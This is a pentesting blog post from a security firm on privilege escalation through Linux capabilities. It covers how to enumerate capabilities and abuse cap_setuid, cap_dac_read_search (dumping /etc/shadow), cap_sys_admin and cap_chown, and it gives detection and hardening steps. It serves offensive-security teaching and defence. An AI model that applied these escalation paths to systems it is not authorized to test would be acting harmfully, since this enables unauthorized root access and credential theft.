BIPI
BIPI

Linux Capabilities Abuse: cap_setuid, cap_dac_read_search, and Friends

Cybersecurity

Linux capabilities are SUID with extra steps. We map the dangerous ones, show how to enumerate file and thread capabilities, and walk the exploits for the usual suspects.

By Arjun Raghavan, Security & Systems Lead, BIPI · March 11, 2025 · 9 min read

#linux#capabilities#privesc#cap-setuid#pentesting

Why capabilities exist

Capabilities split root power into smaller pieces. Instead of giving ping the entire root toolkit, give it cap_net_raw. The intent is good. The implementation leaves plenty of room for operator mistakes, and that is where privesc lives.

Enumeration

  • getcap -r / 2>/dev/null lists file capabilities across the filesystem
  • capsh --print shows the current shell capabilities
  • cat /proc/self/status, grep for Cap to reveal capability bitmaps
  • filecap from libcap-ng for a friendlier view
  • LinPEAS surfaces dangerous capabilities in the capabilities section

cap_setuid, the obvious one

If a binary has cap_setuid+ep and you can call setuid(0) through it, you are root. Python, perl, and ruby with this capability are trivial. A one liner that drops to uid 0 and execs sh is the canonical proof of concept.

cap_dac_read_search and cap_dac_override

  • cap_dac_read_search bypasses read permission checks, dump /etc/shadow
  • cap_dac_override bypasses both read and write checks
  • Combine with tar or rsync for filesystem exfiltration without root
  • GTFOBins capabilities page has the per binary one liners

cap_sys_admin, the catch all

cap_sys_admin is so broad it is sometimes called the new root. It allows mount operations, namespace creation, and a long tail of syscalls. A binary with cap_sys_admin can usually be chained into a full root by mounting a tmpfs over /etc or unsharing into a privileged namespace.

cap_chown and cap_fowner

  • cap_chown lets you change ownership of any file, chown root:root your shell
  • cap_fowner bypasses permission checks on operations that need file ownership
  • Both are common on storage and backup tooling, audit those binaries first

Ambient versus inherited

Capabilities come in sets, effective, permitted, inheritable, ambient, and bounding. For most exploitation you care about the effective and permitted sets of file capabilities. Ambient capabilities are newer, since kernel 4.3, and let a binary keep capabilities across execve without SUID.

Detection and hardening

  • Baseline file capabilities at build, alert on any new getcap results
  • Drop capabilities in systemd units with CapabilityBoundingSet
  • Use NoNewPrivileges=yes in unit files to block capability escalation
  • auditd on the capset syscall for processes outside expected services
  • Falco rule on processes acquiring CAP_SYS_ADMIN in unexpected contexts
Capabilities were meant to be a safer SUID. In practice they are a quieter SUID, which means defenders look at them less.

Closing checklist

getcap -r, intersect with GTFOBins capabilities page, audit any custom binary that carries cap_setuid, cap_sys_admin, cap_dac_read_search, or cap_chown. Four flags, ten minutes, one root.

Read more field notes, explore our services, or get in touch at info@bipi.in. Privacy Policy · Terms.